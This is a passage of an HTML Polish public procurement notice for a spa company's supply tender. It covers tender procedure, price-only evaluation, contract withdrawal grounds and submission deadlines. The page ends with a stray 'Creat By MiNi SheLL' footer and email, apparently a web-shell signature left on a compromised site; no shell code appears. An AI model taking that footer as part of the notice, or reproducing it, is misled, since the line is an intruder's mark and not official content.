d.	oświadczenie o oferowaniu produktów spełniających obowiązujące wymagania i normy jakościowe zgodnie z wymaganiami zawartymi w Polskich Normach, a ponadto odpowiednie wymogi jakościowe dla żywienia w warunkach zbiorowych oraz cechujące się wysokimi walorami smakowymi, a także posiadaniu na oferowane produkty wszelkich niezbędnych dokumentów badań i dopuszczeń do obrotu, certyfikatów i atestów wymaganych przez normy i przepisy mające zastosowanie. Wykonawcy zobowiązani będą do przedłożenia na każde żądanie Zamawiającego kopii tych dokumentów. Wzór oświadczenia - Załącznik nr 5 do Oferty.
pełnomocnictwo w przypadku składania oferty wspólnej,
pełnomocnictwo do działania w imieniu Wykonawcy zgodnie z przepisami k.c. w przypadku, gdy ofertę składa osoba nieupoważniona do reprezentowania Wykonawcy
z mocy prawa,
zaparafowany projekt umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w następujących przypadkach:
a)	jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna),
b)	jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,
Zamawiający może odstąpić od Umowy lub jej części, gdy:
a)	wykonawca dostarczy towar złej jakości,
b)	zostanie zgłoszony wniosek o upadłość lub podjęta uchwała o rozwiązaniu firmy Wykonawcy,
c)	zostanie wydany nakaz zajęcia majątku Wykonawcy,
d)	wykonawca nie rozpoczął realizacji przedmiotu umowy oraz nie kontynuuje jej pomimo wezwania Zamawiającego złożonego na piśmie,
e)	w wypadku stwierdzenia przez Zamawiającego wady przedmiotu umowy, której Wykonawca pomimo trzykrotnego wezwania nie usunął,
f)	w przypadku zwłoki w terminie dostawy stwierdzonej minimum 3 razy,
g)	w przypadku naruszenia przez Wykonawcę, któregokolwiek z postanowień umowy
h)	wystąpi istotna zmiana okoliczności powodującej, że wykonanie Umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia Umowy. Zamawiający w tym przypadku może od Umowy odstąpić w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia w formie pieniężnej należnego mu z tytułu wykonania części Umowy do momentu odstąpienia od Umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczawno-jedlina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Szczawno-Jedlina S.A.
ul. Ratuszowa 1
58-310 Szczawno Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2010 godzina 10:00, miejsce: Uzdrowisko Szczawno-Jedlina S.A.
ul. Ratuszowa 1, Kancelaria 1 piętro
58-310 Szczawno Zdrój.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com